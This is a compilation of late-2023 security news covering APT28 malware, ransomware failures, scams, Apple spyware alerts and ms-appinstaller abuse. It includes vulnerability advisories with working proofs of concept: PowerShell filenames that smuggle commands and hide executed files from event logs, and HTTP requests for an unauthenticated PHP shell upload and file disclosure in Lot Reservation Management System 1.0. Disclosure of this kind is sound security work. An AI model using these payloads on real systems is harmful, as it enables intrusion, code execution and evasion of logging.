The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a new phishing campaign orchestrated by the Russia-linked APT28 group to deploy previously undocumented malware such as OCEANMAP, MASEPIE, and STEELHOOK to harvest sensitive information.
The activity, which was detected by the agency between December 15 and 25, 2023, targets government entities

The Computer Emergency Response Team of Ukraine (CERT-UA) has warned of a new phishing campaign orchestrated by the Russia-linked APT28 group to deploy previously undocumented malware such as OCEANMAP, MASEPIE, and STEELHOOK to harvest sensitive information.

The activity, which was detected by the agency between December 15 and 25, 2023, targets government entities with email messages urging recipients to click on a link to view a document.

UPCOMING WEBINAR

From USER to ADMIN: Learn How Hackers Gain Full Control

Discover the secret tactics hackers use to become admins, how to detect and block it before it's too late. Register for our webinar today.

Join Now

However, to the contrary, the links redirect to malicious web resources that abuse JavaScript and the "search-ms:" URI protocol handler to drop a Windows shortcut file (LNK) that launches PowerShell commands to activate an infection chain for a new malware known as MASEPIE.

MASEPIE is a Python-based tool to download/upload files and execute commands, with communications with the command-and-control (C2) server taking place over an encrypted channel using the TCP protocol.

The attacks further pave the way for the deployment of additional malware, including a PowerShell script called STEELHOOK that's capable of harvesting web browser data and exporting it to an actor-controlled server in Base64-encoded format.

Also delivered is a C#-based backdoor dubbed OCEANMAP that's designed to execute commands using cmd.exe.

"The IMAP protocol is used as a control channel," CERT-UA said, adding persistence is achieved by creating a URL file named "VMSearch.url" in the Windows Startup folder.

"Commands, in Base64-encoded form, are contained in the 'Drafts' of the corresponding email directories; each of the drafts contains the name of the computer, the name of the user and the version of the OS. The results of the commands are stored in the inbox directory."

The agency further pointed out that reconnaissance and lateral movement activities are carried out within an hour of the initial compromise by taking advantage of tools like Impacket and SMBExec.

The disclosure comes weeks after IBM X-Force revealed APT28's use of lures related to the ongoing Israel-Hamas war to facilitate the delivery of a custom backdoor called HeadLace.

In recent weeks, the prolific Kremlin-backed hacking group has also been attributed to the exploitation of a now-patched critical security flaw in its Outlook email service (CVE-2023-23397, CVSS score: 9.8) to gain unauthorized access to victims' accounts within Exchange servers.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

CERT-UA Uncovers New Malware Wave Distributing OCEANMAP, MASEPIE, STEELHOOK

Ransomware gangs don't always win, and when they don't, it feels pretty great.

Ransomware gangs care about one thing: Stealing money.

Over time, their craven, cybercriminal efforts have toppled businesses, destabilized hospitals, and ruined lives. Worst of all, they show no sign of slowing down, and their extortion attempts—which no longer focus on ransomware delivery alone—are getting bolder, meaner, and uglier.

As Allan Liska, intelligence analyst at Recorded Future, recently said on the Lock and Code podcast, times have changed.

“There are no protections anymore,” Liska said. “For a while, some ransomware actors \[said\] ‘No, we won’t go after hospitals, or we won’t do this, or we won’t do that.’ Those protections all seem to have flown out the window, and they’ll go after anything and anyone that will make them money. It doesn’t matter how small they are or how big they are.”

Considering all this, it’s pretty damn nice to see ransomware gangs lose.

As the holidays put people closer to family and friends (and ransomware gangs closer to attacking—seriously, watch out for that), Malwarebytes Labs is sharing some of the brighter moments of 2023 in which ransomware gangs didn’t get what they wanted. And while some of these “victories” still include an unfortunate ransomware deployment, they all have the same result for the ransomware gangs involved: A lost payday.

Here are four times ransomware gangs failed in 2023.

**1\. The Royal Mail ransomware attack**

On January 11, the Royal Mail service in the United Kingdom publicly announced that it had suffered a “severe service disruption” due to a cyber incident. Until the incident was cleared, customers were asked to not send packages or letters overseas.

Within days of Royal Mail’s announcement, news outlets began linking the alleged cyber incident to the ransomware gang LockBit, which, oddly, denied the attack.

But underneath the public reporting, a fascinating negotiation between the cybercriminal gang and its victim would play out for weeks.

On January 12, a representative for Royal Mail makes contact with a cybercriminal for LockBit on a chat hosted in the dark web. The Royal Mail rep is direct, says they work in IT, and, curiously, has a deft command of flattery, referring to LockBit’s work as “pen-testing.” More impressively, the Royal Mail rep immediately takes control of the conversation by implementing one of the most effective strategies in ransomware negotiations: Stalling for time.

Despite LockBit’s constant pushes for urgency, the Royal Mail rep grinds the conversation to a halt, at one point raising a thus-unheard-of concern with LockBit’s decryption key: Yes, it may work on a few sample files, but will it work on _really big files_?

“My management have heard that your decryptor might not work on large files,” the Royal Mail rep says, deploying yet another stunning negotiation tactic by trying to invoke a manager to deliver difficult news.

After days of back and forth, the LockBit rep returns to the most important issue—payment. LockBit had asked for an astounding $80 million ransom, and, after enough delay, it is time to talk money.

But again, Royal Mail’s rep turns the tables. Yes, the Royal Mail service could possibly make a payment that large, but there is only one problem, the representative says: We’re not Royal Mail.

Shock. Horror. Utter embarrassment. According to the Royal Mail rep, LockBit had attacked _the wrong Royal Mail_, instead deploying ransomware for a Royal Mail subsidiary, where a more reasonable starting point in ransomware demands should be about $4 million.

At this point, the LockBit rep accepts defeat.

“You are a very clever negotiator,” the LockBit agent says. “I appreciate your experience in stalling and bamboozling.”

We’ll take that as a win.

**2\. MGM bounces back 10 days after ransomware siege**

In Sin City, the house always wins, even when it loses $100 million.

In the late hours of September 11, customers and hotel guests at the Las Vegas resort MGM Grand noticed something was off—literally. On TikTok, a user shared a video showing rows of digital gambling machines with blank, non-functional screens. On the MGM Grand website, online reservations had become inaccessible. And for some unfortunate guests, even their room keys didn’t work.

“Digital keys weren’t working,” said the same TikTok user who shared video of the hotel’s broken digital slot machines. “Had to get physical keys printed.”

MGM Grand had been hit by a ransomware gang named Scattered Spider, a group of cybercriminals that, it would turn out, had already found some luck on the Las Vegas strip.  

On September 14, Caesar’s Entertainment reported in a filing with the US Securities and Exchange Commission that it, too, had suffered a cyber breach, and according to reporting from CNBC, it received a $30 million ransom demand, which it then negotiated down by about 50 percent.

MGM Grand, however, chose a different path. Across 10 hectic days—which included equipping hotel elevators with handheld, two-way radios in case guests encountered any problems—the MGM Grand became operational once more, all without paying a ransom.  

MGM Resorts International later provided a sober estimation of the cost of the recovery effort, expecting a $100 million loss to its third-quarter results, and valid criticism about the hotelier’s security vulnerabilities remain, but in the land of vice and greed, stopping a ransomware gang is a feat that few have accomplished.

**3\. Qakbot shot down**

Duck hunting season came early this year.

In August, an international investigation led by US law enforcement agencies nearly wiped Qakbot from the internet, shutting down a large part of the botnet’s infrastructure, retrieving $8.6 million in cryptocurrency, and removing the botnet’s associated Qakbot malware from hundreds of thousands of infected machines around the world.

When infected with the Qakbot malware, computers would join the Qakbot “botnet,” an army of devices that could be controlled by a cybercriminal gang and pilfered for login credentials. The infected machines would also be susceptible to additional malware, and in the case of Qakbot-infected computers, that additional malware was often the ransomware variant called Black Basta.

Because of this enormous reach, Black Basta consistently appeared in Malwarebytes’ monthly Ransomware Reviews that record the most active ransomware variants across publicly-recorded attacks.

In April, Black Basta was responsible for at least 40 attacks. In September, just one month after Qakbot’s announced takedown, that number dropped to six.

**4\. ALPHV tattles on its victim to little success**

A new wrinkle about modern ransomware attacks is that some of them don’t involve any ransomware at all.

That’s because, years ago, ransomware gangs learned that their malware of choice wasn’t the sole reason that victims paid ransoms. Rather, the ransomware that was deployed was just a digital representation of a highly effective, criminal lever: Extortion.

Since at least 2020, ransomware gangs have implemented a “double-extortion” technique against victims, stealing an organization’s files and threatening to publish them online before also deploying ransomware to encrypt the original copies left behind. More recently, however, ransomware gangs have resorted to just stealing a victim’s data without detonating any ransomware afterwards. The State of Maine, for instance, likely suffered such an attack this year in a data breach that impacted 1.3 million people.

But in November, the ransomware gang ALPHV, also known as BlackCat, tried something different.

Earlier in the month, ALPHV attacked the company MeridianLink. After a few days, MeridianLink showed no sign of paying the ransom, so ALPHV upped the pressure by reporting MeridianLink to, of all places, the US Securities and Exchange Commission (SEC).

To hear ALPHV tell it, MeridianLink was required to report ALPHV’s attack to the SEC because of newly-announced rules from the federal agency that mandate the reporting of any “material cybersecurity incident” within four days.

“It has come to our attention that MeridianLink, in light of a significant breach compromising customer data and operational information, has failed to file the requisite disclosure under Item 1.05 of Form 8-K within the stipulated four business days, as mandated by the new SEC rules,” ALPHV allegedly wrote in their complaint to the SEC.

MeridianLink, however, was unimpressed. After confirming “a” cybersecurity incident, a spokesperson with the company downplayed its severity.

“Based on our investigation to date, we have identified no evidence of unauthorized access to our production platforms, and the incident has caused minimal business interruption,” the MeridianLink spokesperson said. Further, the rules cited by ALPHV were not even in effect, yet, so noncompliance would be impossible.

To date, MeridianLink has not reportedly paid the ransom. More importantly, ALPHV may have learned something the rest of the world already knows: Criminal tactics only gain sympathy within criminal enterprises. Next time, complain to your coworkers, not the federal government.  

**How to avoid ransomware**

*   **Block common forms of entry.** Create a plan for patching vulnerabilities in internet-facing systems quickly; and disable or harden remote access like RDP and VPNs.
*   **Prevent intrusions.** Stop threats early before they can even infiltrate or infect your endpoints. Use endpoint security software that can prevent exploits and malware used to deliver ransomware.
*   **Detect intrusions.** Make it harder for intruders to operate inside your organization by segmenting networks and assigning access rights prudently. Use EDR or MDR to detect unusual activity before an attack occurs.
*   **Stop malicious encryption.** Deploy Endpoint Detection and Response software like ThreatDown EDR that uses multiple different detection techniques to identify ransomware, and ransomware rollback to restore damaged system files.
*   **Create offsite, offline backups.** Keep backups offsite and offline, beyond the reach of attackers. Test them regularly to make sure you can restore essential business functions swiftly.
*   **Don’t get attacked twice.** Once you’ve isolated the outbreak and stopped the first attack, you must remove every trace of the attackers, their malware, their tools, and their methods of entry, to avoid being attacked again.

 The top 4 ransomware gang failures of 2023 

Prior work from this researcher disclosed how PowerShell executes unintended files or BASE64 code when processing specially crafted filenames. This research builds on their PSTrojanFile work, adding a PS command line single quote bypass and PS event logging failure. On Windows CL tab, completing a filename uses double quotes that can be leveraged to trigger arbitrary code execution. However, if the filename got wrapped in single quotes it failed, that is until now.

[+] Credits: John Page (aka hyp3rlinx)      
[+] Website: hyp3rlinx.altervista.org  
[+] Source:  http://hyp3rlinx.altervista.org/advisories/WINDOWS_POWERSHELL_SINGLE_QUOTE_CODE_EXEC_EVENT_LOG_BYPASS.txt  
[+] twitter.com/hyp3rlinx  
[+] ISR: ApparitionSec     

 [Vendor]  
www.microsoft.com

[Product]  
Microsoft Windows PowerShell

Built on the . NET Framework, Windows PowerShell helps IT professionals and power users control and automate the administration of the Windows operating system and applications that run on Windows.

[Vulnerability Type]  
PowerShell Single Quote Code Execution / Event Log Bypass

[CVE Reference]  
N/A

[Security Issue]  
In past times I disclosed how PowerShell executes unintended files or BASE64 code when processing specially crafted filenames.  
This research builds on my "PSTrojanFile" work, adding a PS command line single quote bypass and PS event logging failure.  
On Windows CL tab completing a filename uses double quotes that can be leveraged to trigger arbitrary code execution.  
However, if the filename gets wrapped in single quotes it failed, that is until now.

[Single Quote Code Exec Bypass]  
Combining both the semicolon ";" and ampersand "&" characters, I found it bypasses the single quote limitation given a malicious filename.  
The trailing semicolon ";"  delimits the .XML extension and helps trigger the PE file specified in the case DOOM.exe and the PS event log gets truncated.

Take the following three test cases using Defender API which takes a specially crafted filename.  
C:\>powershell Set-ProcessMitigation -PolicyFilePath  "Test;saps DOOM;.xml"

1) Double quotes OK  
"Test;saps DOOM;.xml" 

2) Single quotes FAILS  
'Test;saps DOOM;.xml'

3) Single quotes BYPASS  
'Test&DOOM;.xml'

PowerShell API calls that prefix the "powershell" cmd is a requirement and may affect many built-in PS API or module commands.  
C:\Users\gg\Downloads\>powershell Start-MpScan -Scanpath 'C:\Users\gg\Downloads\Infected&Malware;.zip'

Malware.exe lives in Downloads dir, notice how we only need a partial name as part of the .ZIP archive filename we are scanning here  
and that it also excludes the .EXE portion in that filename.

[PS Event Log Bypass]  
On Windows PowerShell event logging can be enabled to alert a SOC on suspicious activity and or for incident response forensic artifact purposes.  
However, when bypassing PS single quotes I noticed an interesting side effect. The ampersand "&" character seems to truncate the PS event log.  
Example, processing 'Infected&Malware;.zip' the Event ID 403 logs 'infected' and not the true name of 'Malware.exe' which was actually executed.

Want to mask the true name of the file from PowerShell Event logging? (Malware.exe lives in the same directory)  
C:\>powershell Get-Filehash  'Infected&Malware;.zip'  -algorithm MD5

Below the event log HostApplication contains 'infected' and not the true name of Malware.exe that was actually executed due to truncating.

[PS Log ID 403 Snippet]  
Engine state is changed from Available to Stopped. 

Details:   
  NewEngineState=Stopped  
  PreviousEngineState=Available

  SequenceNumber=25

  HostName=ConsoleHost  
  HostVersion=5.1.19041.1682  
  HostId=fecdc355-0e89-4d4c-a31d-7835cafa44f0  
  HostApplication=powershell get-filehash 'Infected  
  EngineVersion=5.1.19041.1682

[Exploit/POC]  
powershell Get-Filehash  'Infected&Malware;.zip'  -algorithm MD5

Run some malware plus bypass logging of true file name:  
C:\Users\gg\Downloads>powershell get-filehash  'Infected&Malware;.zip'  -algorithm  md5  
PE file Malware.exe in the Downloads directory, notice the .zip we are scanning doesn't include .exe in the filename.

Defender Anti-Malware API:  
powershell Start-MpScan -Scanpath 'C:\Users\gg\Downloads\Infected&Malware;.zip'

Call ping cmd using double "&":  
C:\>powershell Get-Filehash  'powerfail&ping 8.8.8.8&.txt'  -algorithm  md5

Call a Windows cmd to Logoff the victim:  
C:\>powershell Start-MpScan -Scanpath 'virus&logoff&test.zip'

We have options:

A) to call commands use double "&" --> 'virus&logoff&test.zip'  
B) bypass PS event logging of the true file name and execute code use "&" with ";" --> 'Infected&Malware;.zip'

[References]  
https://github.com/hyp3rlinx/PSTrojanFile  
https://hyp3rlinx.altervista.org/advisories/MICROSOFT_DEFENDER_ANTI_MALWARE_POWERSHELL_API_UNINTENDED_CODE_EXECUTION.txt  
https://hyp3rlinx.altervista.org/advisories/MICROSOFT-WINDOWS-POWERSHELL-UNSANITIZED-FILENAME-COMMAND-EXECUTION.txt

[Network Access]  
Local

[Severity]  
High

[Disclosure Timeline]  
Vendor Notification: circa 2019  
December 27, 2023 : Public Disclosure

[+] Disclaimer  
The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise.  
Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and  
that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit  
is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility  
for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information  
or exploits by the author or elsewhere. All content (c).

hyp3rlinx

Microsoft Windows PowerShell Code Execution / Event Log Bypass

Lot Reservation Management System version 1.0 suffers from a remote shell upload vulnerability.

    # Exploit Title: Lot Reservation Management System Unauthenticated File Upload and Remote Code Execution# Google Dork: N/A# Date: 10th December 2023# Exploit Author: Elijah Mandila Syoyi# Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip# Version: 1.0# Tested on: Microsoft Windows 11 Enterprise and XAMPP 3.3.0# CVE : N/ADeveloper description about application purpose:-------------------------------------------------------------------------------------------------------------------------------------------------------------------AboutThe Lot Reservation Management System is a simple PHP/MySQLi project that will help a certain subdivision, condo, or any business that selling a land property or house and lot. The system will help the said industry or company to provide their possible client information about the property they are selling and at the same time, possible clients can reserve their desired property. The lot reservation system website for the clients has user-friendly functions and the contents that are displayed can be managed dynamically by the management. This system allows management to upload the area map, and by this feature, the system admin or staff will populate the list of lots, house models, or the property that they are selling to allow the possible client to choose the area they want. The map will be divided into each division of the property of building like Phase 1-5 of a certain Subdivision, each of these phases will be encoded individually in the system along with the map image showing the division of each property or lots.------------------------------------------------------------------------------------------------------------------------------------------------------------------Vulnerability:-The application does not properly verify authentication information and file types before files upload. This can allow an attacker to bypass authentication and file checking and upload malicious file to the server. There is an open directory listing where uploaded files are stored, allowing an attacker to open the malicious file in PHP, and will be executed by the server.Proof of Concept:-(HTTP POST Request)POST /lot/admin/ajax.php?action=save_division HTTP/1.1Host: 192.168.150.228User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: */*Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateX-Requested-With: XMLHttpRequestContent-Type: multipart/form-data; boundary=---------------------------217984066236596965684247013027Content-Length: 606Origin: http://192.168.150.228Connection: closeReferer: http://192.168.150.228/lot/admin/index.php?page=divisions-----------------------------217984066236596965684247013027Content-Disposition: form-data; name="id"-----------------------------217984066236596965684247013027Content-Disposition: form-data; name="name"sample-----------------------------217984066236596965684247013027Content-Disposition: form-data; name="description"sample-----------------------------217984066236596965684247013027Content-Disposition: form-data; name="img"; filename="phpinfo.php"Content-Type: application/x-php<?php phpinfo() ?>-----------------------------217984066236596965684247013027--Check your uploaded file/shell in "http://192.168.150.228/lot/admin/assets/uploads/maps/". Replace the IP Addresses with the victim IP address.

Lot Reservation Management System 1.0 Shell Upload

Lot Reservation Management System version 1.0 suffers from a file disclosure vulnerability.

    # Exploit Title: Lot Reservation Management System Unauthenticated File Disclosure Vulnerability# Google Dork: N/A# Date: 10th December 2023# Exploit Author: Elijah Mandila Syoyi# Vendor Homepage: https://www.sourcecodester.com/php/14530/lot-reservation-management-system-using-phpmysqli-source-code.html# Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/lot-reservation-management-system.zip# Version: 1.0# Tested on: Microsoft Windows 11 Enterprise and XAMPP 3.3.0# CVE : N/ADeveloper description about application purpose:-------------------------------------------------------------------------------------------------------------------------------------------------------------------AboutThe Lot Reservation Management System is a simple PHP/MySQLi project that will help a certain subdivision, condo, or any business that selling a land property or house and lot. The system will help the said industry or company to provide their possible client information about the property they are selling and at the same time, possible clients can reserve their desired property. The lot reservation system website for the clients has user-friendly functions and the contents that are displayed can be managed dynamically by the management. This system allows management to upload the area map, and by this feature, the system admin or staff will populate the list of lots, house models, or the property that they are selling to allow the possible client to choose the area they want. The map will be divided into each division of the property of building like Phase 1-5 of a certain Subdivision, each of these phases will be encoded individually in the system along with the map image showing the division of each property or lots.------------------------------------------------------------------------------------------------------------------------------------------------------------------Vulnerability:-The application is vulnerable to PHP source code disclosure vulnerability. This can be abused by an attacker to disclose sensitive PHP files within the application and also outside the server root. PHP conversion to base64 filter will be used in this scenario.Proof of Concept:-(HTTP POST Request)GET /lot/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1Host: 192.168.150.228User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeReferer: http://192.168.150.228/lot/Cookie: PHPSESSID=o59sqrufi4171o8bkbmf1aq9snUpgrade-Insecure-Requests: 1The same can be achieved by removing the PHPSESSID cookie as below:-GET /lot/index.php?page=php://filter/convert.base64-encode/resource=admin/db_connect HTTP/1.1Host: 192.168.150.228User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeReferer: http://192.168.150.228/lot/Upgrade-Insecure-Requests: 1The file requested will be returned in base64 format in returned HTTP response.The attack can also be used to traverse directories to return files outside the web root.GET /lot/index.php?page=php://filter/convert.base64-encode/resource=D:\test HTTP/1.1Host: 192.168.150.228User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:102.0) Gecko/20100101 Firefox/102.0Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8Accept-Language: en-US,en;q=0.5Accept-Encoding: gzip, deflateConnection: closeReferer: http://192.168.150.228/lot/Upgrade-Insecure-Requests: 1This will return test.php file in the D:\ directory.

Lot Reservation Management System 1.0 File Disclosure

By Waqas
Big Tech vs. Big Brother: Apple Defies India Pressure over iPhone Hacking Alerts.
This is a post from HackRead.com Read the original post: Apple’s iPhone Hack Attack Warnings Spark Political Firestorm in India

Apple warned Indian opposition figures and journalists of possible state-backed hacking last year, causing tension with the government questioning the claims and pressuring Apple to soften them.

In October 2023, Apple sent notifications to some Indian opposition politicians and journalists warning them that their iPhones might be targeted by **state-sponsored attackers**. This triggered a strong reaction from the Indian government, which accused Apple of interfering in the country’s internal affairs and questioned the accuracy of its warnings.

Now, Indian officials, as **reported** by the Washington Post, pressured Apple to soften the language of the notifications and even summoned a company security expert for a meeting in New Delhi. Apple, on the other hand, has maintained that its notifications are based on credible evidence and that it does not attribute hacking attempts to specific governments.

The individuals who received Apple’s hacking warnings and subsequently posted about them on social media shared a common characteristic: they were critical of Prime Minister Modi’s government.

An investigation into the phone of journalist Anand Mangnale, who was examining Modi ally Gautam Adani, revealed the presence of **Pegasus spyware**, developed by the Israeli company **NSO Group**. While Apple did not explicitly attribute the attacks to the Indian government, Pegasus is typically sold to governments and government agencies.

The report further reveals that India’s ruling political party has neither confirmed nor denied the use of Pegasus to spy on journalists and political opponents. However, instances of critics being infected with Pegasus spyware have been previously **reported**, with a 2021 investigation revealing the presence of the spyware on the phones of individuals with a history of opposing and criticizing Modi’s government.

It is worth noting that if and when Apple suspects a user’s iPhone is being targeted by malicious threat actors or by a state-backed cyber attack, the company has a multi-pronged approach to warn the user. This includes threat notifications, security recommendations, email and iMessage alerts.

****1\. Threat Notification:****

1.  This is the most prominent method. A banner and alert appear on the user’s device when they sign in to appleid.apple.com.
2.  The alert clearly states that they “may be targeted by state-sponsored attackers trying to remotely compromise your iPhone.”
3.  It avoids specifying the attacker’s origin but offers general advice on security measures.

****2\. Email and iMessage Notifications:****

1.  Apple sends emails and iMessages to all email addresses and phone numbers associated with the user’s Apple ID.
2.  These notifications mirror the information in the web-based alert, reiterating the potential state-backed attack and suggesting security steps.

****3\. Security Recommendations:****

*   Both the web-based and email/iMessage notifications provide general security advice, such as:
    *   Updating devices to the latest software with security patches.
    *   Enabling two-factor authentication for Apple ID and other critical accounts.
    *   Reviewing iCloud settings and disabling access to non-essential apps.
    *   Changing passwords for important accounts.

It is also important to note that Apple doesn’t share specific details about the attackers or the attack methods to protect their sources and investigations. These notifications are triggered by specific indicators observed by Apple, but not all targeted users may receive one. Receiving a notification doesn’t necessarily mean your iPhone is compromised, but it’s a cautionary flag to take serious security measures.

****Hack alert vs. Apple lockdown mode****

It is also important to differentiate that while threat notifications alert users of cyberattacks, **Apple Lockdown mode** goes one step further by providing extreme protection against sophisticated digital threats by restricting certain functionalities like FaceTime, web browsing, and message attachments.

The Lockdown mode is also Primarily for individuals facing confirmed or imminent high-level cyber threats, such as journalists, activists, or dissidents. Nevertheless, the alleged involvement of Indian authorities in pressuring Apple to downplay the political impact of its hacking warnings, particularly targeting individuals critical of the Modi government.

The use of Pegasus spyware, known for its association with governments and government agencies, also raises concerns about potential state-sponsored surveillance of journalists and political opponents in India and elsewhere.

****_RELATED ARTICLES_****

1.  **QuaDream: Israeli Cyber Mercenary Behind iPhone Hacks**
2.  **Android Version of Sophisticated Pegasus Spyware Discovered**
3.  **iPhones of 9 State Dept officials hijacked by NSO Pegasus spyware**
4.  **Did Saudi Crown Prince use Israeli spyware to hack Jeff Bezos’s iPhone?**
5.  **iPhones of 36 Al Jazeera journalists hacked with NSO’s zero-click spyware**

Apple’s iPhone Hack Attack Warnings Spark Political Firestorm in India

Online scams abound every day, but these four scams from 2023 were particularly devious.

In 2023, the public primarily confronted two varieties of online scams: the technical and the topical.

Technical scams abuse legitimate aspects of modern internet infrastructure to lead users to illegitimate or compromised sites. A team of hackers can, say, boost their own info-stealing websites through Google search results, providing a veneer of authenticity to their malicious intent. These scams can involve vast criminal segmentation and coordination between malware developers, code writers, and hackers who sometimes also infect legitimate websites with dangerous tools.

Topical scams, on the other hand, are simpler. By leveraging major news events or luring users with too-good-to-be-true deals, cybercriminals trick victims into giving away their vital credit card information through cyberspace.

Both are dangerous, both are effective, and both had their fair share of sneaky examples this year.

With your holiday shopping over (or, we hope it’s over, as it’s a bit late now for gifts), we at Malwarebytes Labs wanted to look back on four of the sneakiest online scams we saw last year.

****Forged in fire, fraud on Facebook****

In November, an insulated tumbler made by the drinkware company Stanley allegedly survived a roaring fire that sadly destroyed a woman’s car. The car owner, Danielle Marie Lettering, posted a video on TikTok that showed a Stanley tumbler—merely singed—inside a wrecked Kia.

“Everybody is so concerned if the Stanley spills but what else,” Lettering said in the video she posted. “It was in a fire yesterday and it still has ice in it.”

Lettering’s TikTok video has more than 90 million views and a wealth of comments about first-time interest in Stanley’s products.

And right on time, just weeks later, Malwarebytes Labs spotted a fraudulent Facebook ad—posing as a legitimate sale from Dick’s Sporting Goods—selling the now-storied Stanley Quencher cup for just $19, a steal compared to Amazon listings near $45.

Users who clicked on the ad were not taken to the legitimate website for Dick’s Sporting Goods, but instead routed to a website where the payment processor was registered in Hong Kong.

Sprung just before Black Friday, this scam had it all—the urgency of an annual mega-shopping event, the name of a recognized and trusted online retailer, and the allure of a once-benign product now launched into viral celebrity.

****WoofLocker sends victims into a redirection labyrinth****

Tech support scams often follow a similar plot: Cybercriminals will place malicious ads online that label a bogus phone number for everyday users who are experiencing common tech problems. When those users look up their tech troubles online, they’ll see results that display the scammers’ phone number, fooling them into calling what they think is a legitimate helpline, only to be led through a series of social engineering tricks to eventually hand over their money.

But the tech support scam held up by “Wooflocker” is different.

Wooflocker does not rely on malicious advertising (also known as malvertising). Wooflocker only ensnares victims who, of their own accord, visit any of several compromised websites.

With every visit to a compromised website, a user is surreptitiously “fingerprinted”—if their IP address, computer environment, and cyber-defenses (or lack thereof) are all preferable to the hackers behind Wooflocker, then those website visitors are redirected to another domain with a URL that is created then and there by Wooflocker’s hacking scripts.

Malwarebytes Labs first spotted Wooflocker in 2020, and even then, we learned that the cybercriminals behind it had likely been building out their web traffic redirection machine since 2017. But in the years since we last checked in, Wooflocker has become more sophisticated. The current iteration of Wooflocker now relies on web hosting services in Bulgaria and Ukraine, which could potentially provide added protection against any takedown efforts.

****The “logout king”** gets pinned**

In March, the reporting outlet ProPublica revealed that, after months of investigation, it had likely tracked down one of the most notorious online scammers—the self-proclaimed “log-out king,” also known as OBN Brandon.

OBN Brandon’s trick is almost always the same. He reports accounts of growing Instagram influencers to the customer service department of Meta, the company formerly known as Facebook, which also owns Instagram. Once he wrongfully enacts a ban on the account, OBN Brandon reaches out to the person behind the account and says he can bring it back—for a price.

As to _how_ OBN Brandon convinces Meta’s customer support to take down an account, there are multiple tactics. According to ProPublica:

“In some cases OBN hacks into accounts to post offensive content. In others, he creates duplicate accounts in his targets’ names, then reports the original accounts as imposters so they’ll be barred for violating Meta’s ban on account impersonation. In addition, OBN has posed as a Meta employee to persuade at least one target to pay him to restore her account.”

Once a simple image-sharing tool, Instagram has now ballooned into a business platform for countless influencers who take promotional offers from larger companies to be featured in posts and Reels—which are short-form videos on the app. Similarly, many small businesses and entrepreneurs use the platform to self-promote and connect users to their products and services.

One OBN victim that ProPublica spoke to claimed that, before his account was targeted, he had been making between $15,000 and $20,000 a month simply from his Instagram account.

“People pay me all the time to post promos for music, crypto,” the individual told ProPublica. “I can make five, 10 grand by accident if I needed to. … The money’s crazy.”

In its investigation, ProPublica identified a 20-year-old Nevada man as a likely operator or affiliate behind OBN Brandon. Once the outlet gave more details to Meta, Meta sent a cease-and-desist order to the man, also banning him from the platform.

****In their villain era****

For years, Taylor Swift fans were starving.

Not since 2018 had the most recent TIME Person of the Year produced a full-fledged world circuit tour. But in 2023, that changed, when Swift began her “Eras” tour, a globe-spanning celebration of her past albums that, on stage, delighted audiences for three-and-a-half hours every night, no matter the weather.

Still in production, Swift’s “Eras” tour has already brought in literal billions for the pop star goddess, according to one Washington Post estimate.

But the tour has also brought in a significant payday for ticket scammers.

In June, just a few months into the start of the “Eras” tour, Attorney General Dana Nessel for the state of Michigan issued a warning to Swift fans in her state.

“Michigan residents who are defrauded by online ticket scammers should not just shake it off,” said Nessel. “We know these scams all too well. If you believe you were taken advantage of, filing a complaint with my office is better than revenge.”

According to Malwarebytes Labs’ own reporting at the time, scams that preyed on the Eras tour were popping up all across the United States:

“Other locations for the tour are trying to get ahead of the scam curve, issuing their own warnings ahead of events where possible. For example, Cincinnati has highlighted tales of woe related to fake ticket sales on Facebook. Detroit flagged fake ticket sales on Instagram. CBC covered multiple fake sale attempts cheating folks in Canada out of significant chunks of money. Elsewhere, teens have lost out on $1,200 thanks to Craigslist scammers.”

With many, many, many more shows scheduled (the latest of which is in December 2024), stay alert.

**We don’t just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

 4 sneaky scams from 2023 

Summary In recent months, Microsoft Threat Intelligence has observed threat actors leveraging social engineering and phishing techniques to target Windows OS users and utilizing the ms-appinstaller URI scheme. We have addressed and mitigated this malicious activity by turning off ms-appinstaller by default. Additionally, Microsoft has coordinated with Certificate Authorities to revoke the abused code signing certificates utilized by malware samples we have identified.

**Summary**

In recent months, Microsoft Threat Intelligence has observed threat actors leveraging social engineering and phishing techniques to target Windows OS users and utilizing the ms-appinstaller URI scheme. We have addressed and mitigated this malicious activity by turning off ms-appinstaller by default. Additionally, Microsoft has coordinated with Certificate Authorities to revoke the abused code signing certificates utilized by malware samples we have identified.

Upon detection of this attack vector, Microsoft launched an investigation to ensure proper detections existed within Microsoft Defender for Endpoint and Microsoft Defender for Office to protect our customers.

**Background**

Microsoft initially introduced the ms-appinstaller URI scheme handler in App Installer v1.0.12271.0 to improve the installation experience for MSIX and MSIXBundles.

Recently, malicious activity was observed where bad actors are now using the ms-appinstaller URI scheme handler to trick users into installing malicious software. We highly recommend customers do not install apps from unknown websites.

**Mitigations**

On December 28th, 2023, Microsoft updated CVE-2021-43890 to disable ms-appinstaller URI scheme (protocol) by default, as a security response to protect customers from attackers’ evolving techniques against previous safeguards. This means that users will no longer be able to install an app directly from a web page using the MSIX package installer. Instead, users will be required to download the MSIX package first in order to install it, which ensures that locally installed antivirus protections will run.

